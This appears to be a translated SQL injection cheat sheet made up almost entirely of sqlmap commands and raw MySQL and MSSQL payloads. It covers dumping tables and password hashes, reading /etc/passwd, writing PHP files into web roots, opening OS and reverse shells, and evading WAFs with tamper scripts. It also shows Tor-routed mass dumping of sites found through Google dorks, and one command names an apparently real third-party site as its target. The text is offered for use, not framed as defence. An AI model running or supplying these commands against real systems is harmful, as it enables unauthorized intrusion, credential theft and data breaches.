1# Basic usage
2
3./sqlmap.py -u "inject address" --dbs // enumerate database
4./sqlmap.py -u "inject address" --current-db // current database
5./sqlmap.py -u "inject address" --users // list database users
6./sqlmap.py -u "inject address" --current-user // current user
7./sqlmap.py -u "inject address" --tables -D "database" // enumerate the table name of the database
8./sqlmap.py -u "inject address" --columns -T "table name" -D "database" // get the column name of the table
9./sqlmap.py -u "inject address" --dump -C "field, field" -T "table name" -D "database" // dump the data of the listed columns from the table (a table dump, "dragging the pants" in the original slang)
10
11# bypass WAF :
12--tamper= apostrophemask,apostrophenullencode,chardoubleencode,escapequotes,overlongutf8,space2plus,symboliclogical,base64encode,unionalltounion,xforwardedfor,multiplespaces,nonrecursivereplacement
13
14
15# Cookie injection:
16sqlmap.py -u URL --cookie "parameter" --tables --level 2
17
18# POST login box injection:
19sqlmap.py -r FILE.TXT -p username --tables --forms -v 3 --dbs --batch --os "Windows" --tamper space2morehash.py,space2hash.py,base64encode.py,charencode.py
20
21Bypass WAF :
22
23sqlmap.py -u "inject address" -v 3 --dbs --batch --tamper space2morehash.py,space2hash.py,base64encode.py,charencode.py
24Sqlmap.py -u URL -v 3 -dbms "MySQL" --tamper "space2morehash.py" --referer "http://www.google.com" - -user-agent "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
25
26sqlmap.py -r FILE.TXT -p username --tables --forms -v 3 --dbs --batch --os "Windows" --tamper space2morehash.py,space2hash.py,base64encode.py,charencode.py
27
28
29
30
31# Submit using the POST method
32sqlmap -u "http://192.168.1.1/sqlmap/oracle/post_int.php" --method POST --data "id=1"
33sqlmap -u "https://xxxxx//search.aspx" --forms --batch --crawl=10 --dbms=MSSQL --dbs --current-db --technique=BEUST --risk=3 --level=3
34
35# Read the database version, current user, current database
36Sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -f -b --current-user --current-db -v 1
37
38# Determine the current database user permissions
39Sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --privileges -U username-v 1
40Sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --is-dba -U username-v 1
41
42# Read the passwords of all database users or specified database users
43Sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --users --passwords -v 2
44Sqlmap.py-u http://www.xxxxx.com/test.php?p=2 --passwords -U root -v 2
45
46# Get all the databases
47Sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --dbs -v 2
48
49# Get all the tables in the specified database
50Sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --tables -D mysql -v 2
51
52# Get the field of the specified table in the specified database name
53Sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --columns -D mysql -T users -v 2
54
55# Get the data of the specified field in the specified table in the specified database name
56Sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --dump -D mysql -T users -C "username,password" -s "sqlnmapdb.log" -v 2
57
58# file-read read web file
59
60Sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --file-read "/etc/passwd" -v 2
61
62# file-write writes files to the web
63Sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --file-write /localhost/mm.php --file-dest /var/www/html/xx.php -v 2
64
65# --union-cols: range of columns to test for UNION query injection
66
67Sqlmap.py -u "http://url/news?id=1" --union-cols
68
69# injection
70
71# Get the current user name
72Sqlmap.py -u "http://url/news?id=1" --current-user
73# Get the current database name
74Sqlmap.py -u "http://www.xxoo.com/news?id=1" --current-db
75# list the tables of a database
76Sqlmap.py -u "http://www.xxoo.com/news?id=1" --tables -D "db_name"
77#list the columns (fields) of a table
78Sqlmap.py -u "http://url/news?id=1" --columns -T "tablename" users-D "db_name" -v 0
79#Get the field contents
80Sqlmap.py -u "http://url/news?id=1" --dump -C "column_name" -T "table_name" -D "db_name" -v 0
81# --smart: run thorough tests only where heuristics are positive; --level: test level
82Sqlmap.py -u "http://url/news?id=1" --smart --level 3 --users
83# dbms Specify database type
84Sqlmap.py -u "http://url/news?id=1" --dbms "Mysql" --users
85#list database users
86Sqlmap.py -u "http://url/news?id=1" --users
87
88
89# Instructions for use:
90Injection point: www.xxx.com/user.jsp?id=1
91
921. Determine if the injection exists
93sqlmap.py -u "www.xxx.com/user.jsp?id=1"
94
952. Get the databases (not needed for Access databases)
96sqlmap.py -u "www.xxx.com/user.jsp?id=1" --dbs
97
983. View the database used by the current application (not needed for Access databases)
99sqlmap.py -u "www.xxx.com/user.jsp?id=1" --current-db
100
1014. List all the tables of the specified database
102sqlmap.py -u "www.xxx.com/user.jsp?id=1" --table -D database
103
1045. Read the field name in the specified table
105Sqlmap.py -u "www.xxx.com/user.jsp?id=1" --columns -T "datasheet" -D "database"
106
1076. Read the contents of the specified field
108Sqlmap.py -u "www.xxx.com/user.jspid=1" --dump -C" field" -T "datasheet" -D "database"
109After reading the data, sqlmap writes it to the Sqlmap/output/ directory; the file is saved as "Table.csv".
110
1111. Test injection point permissions
112Sqlmap.py -u "URL" --privileges //Test permissions for all users
113Sqlmap.py -u "URL" --privileges -U sa //Test sa user rights
114
1152. Execute the Shell command
116Sqlmap.py -u "URL" --os-cmd="net user" //Execute the net user command
117Sqlmap.py -u "URL" --os-shell //System interaction shell
118
1193. Get the current database name
120sqlmap.py -u "URL" --current-db
121
1224. Execute the SQL command
123Sqlmap.py -u "URL" --sql-shell //Returns the SQL interaction shell and can execute SQL statements
124Sqlmap.py -u "URL" --sql-query="sql"
125
1265. POST submission method
127Sqlmap.py -u "URL" --data "POST parameter"
128
1296. Verbosity level
130sqlmap.py -u "URL" --dbs -v 1
131
132The -v parameter contains the following seven levels.
1330: only show Python tracebacks, errors and critical messages;
1341: Display information and warning information;
1352: Display debugging information;
1363: payload injection;
1374: Display HTTP request;
1385: Display HTTP response headers;
1396: Display the contents of the HTTP response page.
140
1417. Inject from a saved HTTP request
142Sqlmap.py -r head.txt --dbs //head.txt content is an HTTP request
143
144The contents of head.txt can be captured with Burp Suite
145
1468. Connect directly to the database
147sqlmap.py -d"mysql://admin:admin@192.168.1.1:3306/testdb" --dbs
148
1499. Injection level
150sqlmap.py -u "URL" --level 3
151
15210. Insert the injection statement at the marked location (usually used for pseudo-static URLs)
153sqlmap.py -u "http://www.xxx.com/id/2*.html" --dbs
154
15511. Use a sqlmap tamper script
156sqlmap.py -u "URL" --tamper "space2morehash.py"
157
158Sqlmap Tamper
159
160Script name: apostrophemask.py
161Role: replaces quotes with their UTF-8 full-width encoding
162example:
163("1 AND '1'='1")
164'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
165Requirement:
166All
167
168
169Script name: equaltolike.py
170Role: like instead of the equal sign
171example:
172SELECT * FROM users WHERE id=1
173SELECT * FROM users WHERE id LIKE 1
174Requirement:
175·Microsoft SQL Server 2005
176· MySQL 4, 5.0 and 5.5
177
178
179## Sqlmap common parameters and instructions
180
181-b get banner
182-p specifies test parameters
183-g Get the URL from Google, -g "inurl:aspx?id="
184--gpage=GOOGLEPAGE Specify Google Page Numbers
185--union-check Whether to support union injection
186--union-cols range of columns to test for UNION query injection
187--union-test union statement test
188--union-use uses union injection
189--proxy inject through a proxy
190--threads using multithreading
191--user-agent custom user-agent
192--referer=REFERER HTTP referer header
193--proxy=PROXY Use proxy
194--string specifies keywords
195--tor routes traffic through the Tor anonymity network
196--predict-output common query output prediction
197--keep-alive uses a persistent HTTP(S) connection
198--eval=EVALCODE Evaluate Python code before each request (e.g. to recompute HTTP parameters)
199-a, --all retrieve everything
200--hostname hostname
201--is-dba is admin rights
202--users enumerates all users
203--passwords enumerates all user password hashes
204--roles enumerates all user roles
205--schema enumerates the DBMS schema
206--count retrieves the total number of entries
207--dump dumps DBMS database table entries; specify the field name (column name) with -C
208--dump-all dumps all table items in the DBMS database
209--search searches for a column, table, or database name
210--exclude-sysdbs Excludes the system database when enumerating tables
211--sql-query=query Execute SQL statement
212--file-read=RFILE read operation
213--file-write=WFILE write operation
214--file-dest=DFILE absolute destination path for the write
215--reg-read reads a Windows registry key value
216--reg-add adds a Windows registry key value data
217--reg-del deletes a Windows registry key value data
218--reg-key=REGKEY Windows registry key
219--reg-value=REGVAL Windows registry key
220--reg-data=REGDATA Key-value item data for the Windows registry
221--reg-type=REGTYPE Value type of the Windows registry key
222--dump-format=DUMP dump data format (CSV (default), HTML or SQLITE)
223--hex Use hexadecimal data retrieval
224--output-dir=ODIR directory path for custom output
225--update update Sqlmap
226--purge-output safely removes all content from the output directory
227--check-waf heuristically check for WAF/IPS/IDS protection
228--os-pwn out-of-band (reverse) shell
229--cookie=COOKIE specifies the HTTP Cookie header (for pages behind a login)
230--random-agent Use randomly selected User-Agent
231--tamper=TAMPER use the given tamper script(s)
232--level test level (1-5), default is 1
233--auth-type Digest --auth-cred "testuser:testpass"
234--auth-type Basic --auth-cred "testuser:testpass"
235--dbms "PostgreSQL"
236* MySQL
237* Oracle
238* PostgreSQL
239* Microsoft SQL Server
240--os "Windows"
241* Linux
242* Windows
243
244# Access to information
245
246Sqlmap -u "http://url/news?id=1" --dbms "Mysql" --users # dbms Specify database type
247Sqlmap -u "http://url/news?id=1" --users #list database users
248Sqlmap -u "http://url/news?id=1" --dbs #list databases
249Sqlmap -u "http://url/news?id=1" --passwords #database user password
250Sqlmap -u "http://url/news?id=1" --passwords -U root -v 0 #list the password of the specified user database
251Sqlmap -u "http://url/news?id=1" --dump -C "password,user,id" -T "tablename" -D "db_name" --start 1 --stop 20 #dump the specified fields, entries 1 to 20
252Sqlmap -u "http://url/news?id=1" --dump-all -v 0 #List all tables in all databases
253Sqlmap -u "http://url/news?id=1" --privileges #View Permissions
254Sqlmap -u "http://url/news?id=1" --privileges -U root #View specified user permissions
255Sqlmap -u "http://url/news?id=1" --is-dba -v 1 #is it a database administrator?
256Sqlmap -u "http://url/news?id=1" --roles #enumrate database user roles
257Sqlmap -u "http://url/news?id=1" --udf-inject #Import user-defined functions (get system privileges!)
258Sqlmap -u "http://url/news?id=1" --dump-all --exclude-sysdbs -v 0 #dump all tables, excluding system databases
259Sqlmap -u "http://url/news?id=1" --union-cols #range of columns to test for UNION query injection
260Sqlmap -u "http://url/news?id=1" --cookie "COOKIE_VALUE" #cookie injection
261Sqlmap -u "http://url/news?id=1" -b #Get banner information
262Sqlmap -u "http://url/news?id=1" --data "id=3" #postinjection
263Sqlmap -u "http://url/news?id=1" -v 1 -f #fingerprint database type
264Sqlmap -u "http://url/news?id=1" --proxy "http://127.0.0.1:8118" # inject through a proxy
265Sqlmap -u "http://url/news?id=1" --string "STRING_ON_TRUE_PAGE" #Specify keywords
266Sqlmap -u "http://url/news?id=1" --sql-shell #Execute the specified sql command
267Sqlmap -u "http://url/news?id=1" --file /etc/passwd
268Sqlmap -u "http://url/news?id=1" --os-cmd=whoami #Execute system commands
269Sqlmap -u "http://url/news?id=1" --os-shell #system interactive shell
270Sqlmap -u "http://url/news?id=1" --os-pwn #out-of-band (reverse) shell
271Sqlmap -u "http://url/news?id=1" --reg-read # read win system registry
272Sqlmap -u "http://url/news?id=1" --dbs -o "sqlmap.log" # Save the progress
273Sqlmap -u "http://url/news?id=1" --dbs -o "sqlmap.log" --resume # Restore saved progress
274
275
276
277
278# Fingerprinting the remote system and its database
279sqlmap.py -u "http://localhost/weak.php?id=10" -b
280
281Output :
282[11:19:51] [INFO] the back-end DBMS is MySQL
283[11:19:51] [INFO] fetching banner
284[11:19:51] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
285[11:19:51] [INFO] retrieved: 5.1.61
286web server operating system: Linux Red Hat Enterprise 6 (Santiago)
287web application technology: PHP 5.3.3, Apache 2.2.15
288back-end DBMS: MySQL 5.0.11
289banner: '5.1.61'
290
291# fetch the list of users and roles
292sqlmap.py -u "http://localhost/weak.php?id=10" --users --passwords --privileges --roles --threads=10
293database management system users [5]:
294[*] ''@'localhost'
295[*] ''@'localhost.localdomain'
296[*] 'root'@'127.0.0.1'
297[*] 'root'@'localhost'
298[*] 'root'@'localhost.localdomain'
299database management system users password hashes:
300[*] [1]:
301 password hash: NULL
302[*] root [2]:
303 password hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
304 password hash: NULL
305
306# Reading a system file
307sqlmap.py -u "http://localhost/weak.php?id=10" --file-read=/etc/passwd --threads=10
308
309# Run arbitrary sql command
310sqlmap.py -u "http://localhost/weak.php?id=10" --sql-query="select now();"
311
312output :
313[11:50:22] [INFO] retrieved: 2013-04-15 11:51:10
314select now();: '2013-04-15 11:51:10'
315
316# Interactive shell
317sqlmap.py -u "http://www.xxx.com" --os-cmd "ipconfig"
318sqlmap.py -u "http://www.xxx.com" --os-shell
319sqlmap.py -u "http://www.xxx.com" --os-pwn
320sqlmap.py -u "http://www.xxx.com" --sql-shell
321
322# Form SQL injection :
323/sqlmap.py -u "http://www.xxx.com" --forms --batch --crawl=10 --data "tfUName=1&UPass=1" --cookie "id=9" -p tfUPass
324
325
326# WAF bypass
327/sqlmap.py -u "http://www.xxx.com" --forms --batch --crawl=10 --data "tfUName=1&UPass=1" --cookie "id=9" -p tfUPass --tamper="space2hash.py" -v 3 --dbs
328
329
330# Tor with sqlmap :
331apt-get install -y tor
332Start the Tor service
333sudo service tor start
334
335sqlmap.py --tor --tor-type=SOCKS5 -g "inurl:.php?id=1" --random-agent --dump-all --batch --time-sec=15
336
337
338The -v parameter sets the verbosity level; use it to observe how sqlmap probes an injection point and reads data.
339
340## There are seven levels, the default is 1:
341
3420. Only show Python errors and critical messages.
343
3441. Display basic information and warning information at the same time. (default)
345
3462. Display debug information at the same time.
347
3483. Display the injected payload at the same time.
349
3504. Display HTTP requests at the same time.
351
3525. Display the HTTP response header at the same time.
353
3546. Display the HTTP response page at the same time.
355
356
357# Use sqlmap to dump a database ("remove the pants" in the original slang)
358The --dump parameter dumps table data; add -all (--dump-all) to dump everything.
359
360Dump the specified fields of the specified table:
361
362sqlmap -u "http://xxx/index.php?id=1" --dump -D DBName -T TableName -C "id,username,password"
363
364Dump the whole database:
365
366sqlmap -u "http://xxx/index.php?id=1" -D DBName --dump-all
367
368
369# Advanced usage
370
371-p name  With multiple parameters, e.g. index.php?n_id=1&name=2&data=2020, -p selects the parameter to test (here: name)
372
373Sqlmap -g "google syntax" --dump-all --batch #find injection points via Google dorks and dump all fields automatically; google.com must be reachable
374
375--technique specifies the injection technique(s) to test
376
377Without this option, all techniques are tested by default
378• B: Boolean-based blind
379• E: error-based SQL injection
380• U: UNION query-based injection
381• S: stacked queries
382• T: time-based blind
383
384--tamper applies scripts for bypassing a web application firewall (WAF); by default sqlmap encodes with char()
385
386--tamper plugin directory \sqlmap-dev\tamper
387
388Sqlmap -u "http:// www.2cto.com /news?id=1" --smart --level 3 --users #--smart: thorough tests only where heuristics are positive; --level: test level
389
390Attack example:
391Sqlmap -u "http://url/news?id=1&Submit=Submit" --cookie="xxx" --string="Surname" --dbms=mysql --user --password
392
393# Request
394These options can be used to specify how to connect to the target URL :
395
396--data=DATA Data string sent via POST
397--cookie=COOKIE HTTP Cookie header
398--cookie-urlencode URL encoding generated by cookie injection
399--drop-set-cookie Ignore the Set-Cookie header of the response
399--user-agent=AGENT Specifies the HTTP User-Agent header
400--random-agent uses a randomly selected HTTP User-Agent header
402--referer=REFERER Specifies the HTTP Referer header
403--headers=HEADERS Extra HTTP headers, separated by newlines
404--auth-type=ATYPE HTTP authentication type (Basic, Digest or NTLM)
405--auth-cred=ACRED HTTP authentication credentials (username: password)
406--auth-cert=ACERT HTTP certificate (key_file, cert_file)
407--proxy=PROXY Connect to the target URL using an HTTP proxy
408--proxy-cred=PCRED HTTP Proxy Authentication Credentials (Username: Password)
409--ignore-proxy ignores the system default HTTP proxy
410--delay=DELAY The delay between each HTTP request in seconds
411--timeout=TIMEOUT Time to wait for the connection to time out (default is 30 seconds)
412--retries=RETRIES Number of retries after a connection timeout (default 3)
413--scope=SCOPE Regular expression to filter targets from the provided proxy log
414--safe-url=SAFURL A URL that is visited regularly during the test.
415--safe-freq=SAFREQ Number of test requests between two visits to the safe URL
416
417# Enumeration
418
419These options can be used to enumerate information about the back-end database management system, the structure and data in the tables. In addition, you can also run your own SQL statements.
420
421-b, --banner Retrieve the identity of the database management system
422--current-user retrieves the current user of the database management system
423--current-db retrieves the current database of the database management system
424--is-dba Detects whether the DBMS current user is DBA
425--users enumerates database management system users
426--passwords enumerates database management system user password hashes
427--privileges enumerates permissions for database management system users
428--roles enumerates the roles of database management system users
429--dbs enumerates the database management system database
430--tables enumerates tables in the DBMS database
431--columns enumerates DBMS database table columns
432--dump dumps the entries in the database of the database management system
433--dump-all dumps entries in all DBMS database tables
434--search search column(s), table(s) and/or database name(s)
435-D DB The name of the database to be enumerated
436-T TBL Database table to be enumerated
437-C COL Database column to be enumerated
438-U USER database user used for enumeration
439--exclude-sysdbs Exclude system database when enumerating tables
440--start=LIMITSTART First query output entry to retrieve
441--stop=LIMITSTOP Last query output entry to retrieve
442--first=FIRSTCHAR First query output word character to retrieve
443--last=LASTCHAR Last query output word character to retrieve
444--sql-query=QUERY SQL statement to execute
445--sql-shell prompts interactive SQL shell
446
447# Optimization
448
449These options can be used to optimize the performance of SqlMap.
450
451-o turn on all optimization switches
452--predict-output predicts common query output
453--keep-alive uses a persistent HTTP(S) connection
454--null-connection retrieves the page length without the actual HTTP response body
455--threads=THREADS Maximum HTTP(S) request concurrency (default is 1)
456-p TESTPARAMETER Testable parameter(s)
457--dbms=DBMS forces the backend DBMS to this value
458--os=OS forces the backend DBMS operating system to this value
459--prefix=PREFIX injection payload string prefix
460--suffix=SUFFIX injection payload string suffix
461--tamper=TAMPER Tampering with injected data using the given script(s)
462
463# Detection
464
465These options can be used to specify how to parse and compare the contents of HTTP response pages during blind SQL injection.
466
467--level=LEVEL The level at which the test is performed (1-5, default is 1)
468--risk=RISK Risk of performing tests (0-3, default is 1)
469--string=STRING String to match in the page when the query evaluates to True
470--regexp=REGEXP Regular expression to match in the page when the query evaluates to True
471--text-only based only on text content comparison pages
472
473# Techniques
474
475These options can be used to tune specific SQL injection tests.
476
477--technique=TECH SQL injection technology test (default BEUST)
478--time-sec=TIMESEC DBMS response delay time (default is 5 seconds)
479--union-cols=UCOLS Range of columns to test for UNION query injection
480--union-char=UCHAR Character to use when brute-forcing the number of columns
481
482# Fingerprint (fingerprint)
483
484-f, --fingerprint Perform an extensive DBMS version fingerprint
485
486
487# Brute force
488
489These options can be used to run brute force checks.
490
491--common-tables check for the existence of a common table
492--common-columns check for common columns
493
494
495# User-defined function injection
496
497These options can be used to create user-defined functions.
498
499--udf-inject injection user-defined function
500--shared-lib=SHLIB local path to the shared library
501
502# File system access
503These options can be used to access the underlying file system of the backend database management system.
504
505--file-read=RFILE Reads files from the backend database management system file system
506--file-write=WFILE Write a local file to the backend DBMS file system
507--file-dest=DFILE Absolute path on the backend DBMS file system to write the file to
508
509# Operating system access
510
511These options can be used to access the underlying operating system of the back-end database management system.
512
513--os-shell interactive operating system shell
514--os-pwn Get an OOB shell, meterpreter or VNC
515--os-smbrelay Get an OOB shell, meterpreter or VNC with one click
516--os-bof stored procedure buffer overflow exploit
517--priv-esc database process user privilege
518--msf-path=MSFPATH Metasploit Framework local installation path
519--tmp-path=TMPPATH Absolute path to the remote temporary file directory
520
521
522# Windows registry access
523
524These options can be used to access the backend database management system Windows registry.
525
526--reg-read read a Windows registry key value
527--reg-add writes a Windows registry key value data
528--reg-del removes the Windows registry key
529--reg-key=REGKEY Windows registry key
530--reg-value=REGVAL Windows registry key value
531--reg-data=REGDATA Windows registry key value data
532--reg-type=REGTYPE Windows registry key value type
533
534# General
535These options can be used to set some general working parameters.
536
537-t TRAFFICFILE logs all HTTP traffic to a text file
538-s SESSIONFILE Saves and restores all data retrieved from the session file
539--flush-session flush (clear) the session file of the current target
540--fresh-queries ignores query results stored in session files
541--eta shows the estimated time of arrival for each output
542--update Update SqlMap
543--save file Save options to the INI configuration file
544--batch never asks for user input, using all default configurations.
545
546# Miscellaneous (miscellaneous)
547
548--beep Beep when an SQL injection is found
549--check-payload IDS detection test of the injection payloads
550--cleanup Clean up the DBMS from sqlmap-specific UDFs and tables
551--forms Parse and test the forms on the target URL
552--gpage=GOOGLEPAGE Use Google Dork results from the specified page number
553--page-rank Google dork results show page rank (PR)
554--parse-errors parse database management system error messages from the response page
555--replicate copy dumped data to a sqlite3 database
556--tor uses the default Tor (Vidalia / Privoxy / Polipo) proxy address
557--wizard Simple wizard interface for beginners
558
559
560
561
562
563# Partial usage of SQLMAP
564
5651) Determine whether the current user is a DBA
566python sqlmap.py -u "url" --is-dba -v 1
567
5682) --users: list database management system users
569python sqlmap.py -u "url" --users -v 0
570
5713) --passwords: database user password hashes
572python sqlmap.py -u "url" --passwords -v 0
573python sqlmap.py -u "url" --passwords -U Sa -v 0
574
5754) View user permissions
576python sqlmap.py -u "url" --privileges -v 0
577python sqlmap.py -u "url" --privileges -U postgres -v 0
578
5795) --dbs lists the available databases
580python sqlmap.py -u "url" --dbs -v 0
581
5826) --tables lists the tables of a database
583python sqlmap.py -u "url" --tables -D "information_scheam"
584-D: specify the database name
585
5867) --columns lists the column names in the table
587python sqlmap.py -u "url"--columns -T "user" -D "mysql" -v 1
588-T: specify the name of the table, -D: specify the name of the database
589
5908) --dump lists the contents of the specified table in a database
591python sqlmap.py -u "url" --dump -T "users" -D "testdb"
592-C: can specify the columns to dump
593specify the range of entries 2 to 4:
594python sqlmap. Py -u "url" --dump -T "users" -D "testdb" --start 2 --stop 4 -v 0
595
5969) --dump-all lists the contents of all tables in all databases
597python sqlmap.py - u "url" --dump-all -v 0
598only list the contents of user-created databases and tables (system databases excluded)
599python sqlmap.py -u "url" --dump-all --exclude-sysdbs -v 0
600
60110) --file-read reads file contents [uses the load_file() function]
602python sqlmap.py -u "url" --file /etc/password
603
60411) Execute SQL
605python sqlmap.py -u "url" --sql-shell
606
60712)-p Specify Parameters
608python sqlmap.py -u "url" -v 1 -p "id"
609-p can specify multiple parameters -p "cat,id"
610
61113) POST submit
612python sqlmap.py -u "url" --method POST --data "id=1"
613
61414)COOKIE submission
615Python sqlmap.py -u "url" --cookie "id=1" -v 1
616cookie value can be fetched by TamperData
617
61815) Referer trick
619python sqlmap.py -u "url" --refer "url" -v 3
620
62116) Use a custom User-Agent or a user-agents.txt list
622python sqlmap.py -u "url" --user-agent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" -v 3
623python sqlmap.py - u "url" -v 1 -a "./txt/user-agents.txt"
624
62517) Use multiple threads for retrieval
626python sqlmap.py -u "url" -v 1 --current-user --threads 3
627
62818) Specify the DBMS, bypassing sqlmap's automatic detection
629python sqlmap.py -u "url" -v 2 --dbms "PostgreSQL"
630
63119) Specify the operating system, bypassing sqlmap's automatic detection
632python sqlmap.py -u "url" -v 2 - -os "Windows"
633
63420) --prefix and --postfix: custom payload prefix and suffix
635python sqlmap.py -u "url" -v 3 -p "id" --prefix "'" --postfix "and 'test'='test"
636
63721) UNION injection test
638python sqlmap.py -u "url" --union-test -v -1
639
64022) UNION test using ORDER BY
641python sqlmap.py -u "url" --union-test --union-tech orderby -v 1
642
64323)python sqlmap.py -u "url" -v 1 --union-use --banner
64424)python sqlmap.py -u "url" -v 5 --union-use --current-user
64525)python sqlmap.py -u "url" -v 1 --union-use --dbs
646
647//Execute SQL statement
648Sqlmap.py -u "http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1" -v 1 –sql-shell
649
650//More detailed information
651Sqlmap.py -u "http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1" -v 5
652
653
654
655# Mysql commands :
656SELECT database()
657SELECT version()
658SELECT user()
659select datadir()
660SELECT @@datadir
661SELECT user FROM mysql.user
662SELECT schema_names FROM information_schema.schemata
663SELECT @@hostname
664UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) —
665select @@basedir
666Select system_user()
667select current_user()
668select user()
669select @@version_compile_os
670select now()
671DESC <table name> or SHOW COLUMNS FROM <table name>
672select * from users union select 1,load_file('/etc/passwd'),3;
673select * from users union select 1,load_file(0x2F6574632F706173737764),3;
674select '<?php phpinfo(); ?>' into outfile '/var/www/html/xxx.php';
675select char(60,63,112,104,112,32,112,104,112,105,110,102,111,40,41,59,32,63,62) into outfile '/var/www/html/xxx.php';
676# Get the version number
677SELECT @@version
678SELECT version()
679# host name, IP address
680SELECT @@hostname;
681# username and password
682SELECT host, user, password FROM mysql.user;
683# username
684SELECT user();
685SELECT system_user();
686SELECT user FROM mysql.user;
687SELECT current_user;
688SELECT distinct(db) FROM mysql.db
689SELECT schema_name FROM information_schema.schemata;
690SELECT table_schema, table_name FROM information_schema.tables WHERE Table_schema = ' customers_db'
691SELECT table_schema, table_name FROM information_schema.tables WHERE Table_schema!='mysql' AND table_schema!=' information_schema'
692SELECT table_schema, table_name column_name FROM information_schema.columns WHERE table_schema!='mysql' AND table_schema!=' information_schema'
693SELECT table_schema, table_name, column FROM Information_schema.columns WHERE table_schema != 'mysql' AND Table_schema != 'information_schema';
694SELECT table_schema, table_name column_name FROM information_schema.columns WHERE column_name LIKE 'password' OR column_name LIKE 'credit_card'
695SELECT grantee, privilege_type, is_grantable
696SELECT grantee, table_schema, privilege_type FROM Information_schema.schema_ privileges;
697
698SELECT load_file('databasename/tablename.MYD')
699tables_priv.MYD
700host.MYD
701help_keyword.MYD
702columns_priv.MYD
703db.MYD
704
705
706# User rights related
707# enumerate user permissions
708SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges;
709
710# enumerate user permissions
711SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user ;
712
713# enumerate database permissions
714SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges;
715
716# List columns_priv
717SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges;
718
719# List database
720# current library
721SELECT database();
722
723# All libraries (Mysql > 5.0)
724SELECT schema_name FROM information_schema.schemata;
725
726# List name
727# common
728SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
729
730# Find the name of the table based on the column name
731SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';
732
733# List field names
734SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
735
736# Single data acquisition
737
738SELECT host, user FROM user ORDER BY host LIMIT 1 OFFSET 0;
739
740SELECT host,user FROM user ORDER BY host LIMIT 0,1;
741
742# Error injection
743
744And (select 1 from (select count(*), concat(SQL statement, floor(rand(0)*2))x from information_schema.tables group by x)a);
745And (select count(*) from (select 1 union select null union select !1)x group by concat(SQL statement, floor(rand(0)*2)));
746And extractvalue(1, concat(0x5c, (SQL statement)));
747And 1=(updatexml(1,concat(0x5e24,(SQL statement), 0x5e24),1));
748
749# Delay injection
750
751SELECT BENCHMARK(1000000,MD5('A'));
752SELECT SLEEP(5);
753
754# File reading and writing
755
756# Read a file; requires the relevant privileges
757UNION SELECT LOAD_FILE('/etc/passwd')
758
759# Write a file with INTO DUMPFILE; requires the relevant privileges
760SELECT * FROM mytable INTO dumpfile '/tmp/somefile'
761
762# Write a file with INTO OUTFILE; requires the relevant privileges
763SELECT * FROM mytable INTO outfile '/tmp/somefile'
764
765# Conditionals and string functions
766# IF conditional
767SELECT if(1=1,'foo','bar'); # returns foo
768
769# CASE WHEN conditional
770SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns A
771
772# char function, convert numbers to characters
773SELECT char(65);
774
775# ascii function, convert characters to numbers
776SELECT ascii('A');
777
778# CONCAT function, concatenates strings
779SELECT CONCAT('A','B');
780
781# string hexadecimal notation
782SELECT 0x414243;
783
784# substring/substr function
785SELECT substr('abcd', 3, 1);
786
787# length function
788SELECT length('abcd');
789
790# MSSQL
791
792# Database version
793SELECT @@version
794
795# host name, IP address
796SELECT HOST_NAME()
797
798# Current user
799SELECT user_name();
800SELECT system_user;
801SELECT user;
802SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
803
804# List all users
805SELECT name FROM master..syslogins
806# List password hashes (MSSQL 2005)
807SELECT name, password_hash FROM master.sys.sql_logins --*
808SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins --*
809
810
811# List database
812SELECT DB_NAME()
813
814# enumerate databases
815SELECT name FROM master..sysdatabases;
816SELECT DB_NAME(N); -- where N = 0, 1, 2, ...
817
818# Permission related
819
820# Check the current user's privileges
821SELECT is_srvrolemember('sysadmin');
822SELECT is_srvrolemember('dbcreator');
823SELECT is_srvrolemember('bulkadmin');
824SELECT is_srvrolemember('diskadmin');
825SELECT is_srvrolemember('processadmin');
826SELECT is_srvrolemember('serveradmin');
827SELECT is_srvrolemember('setupadmin');
828SELECT is_srvrolemember('securityadmin');
829
830# Determine the permissions of a specified user
831SELECT is_srvrolemember('sysadmin', 'sa');
832
833# Determine whether the user has database-owner (db_owner) permission
834And 1=(Select IS_MEMBER('db_owner'))
835
836# Determine whether the user has access to the database
837And 1= (Select HAS_DBACCESS('master'))
838
839# Get the user names that have a given permission
840SELECT name FROM master..syslogins WHERE denylogin = 0;
841SELECT name FROM master..syslogins WHERE hasaccess = 1;
842SELECT name FROM master..syslogins WHERE isntname = 0;
843SELECT name FROM master..syslogins WHERE isntgroup = 0;
844SELECT name FROM master..syslogins WHERE sysadmin = 1;
845SELECT name FROM master..syslogins WHERE securityadmin = 1;
846SELECT name FROM master..syslogins WHERE serveradmin = 1;
847SELECT name FROM master..syslogins WHERE setupadmin = 1;
848SELECT name FROM master..syslogins WHERE processadmin = 1;
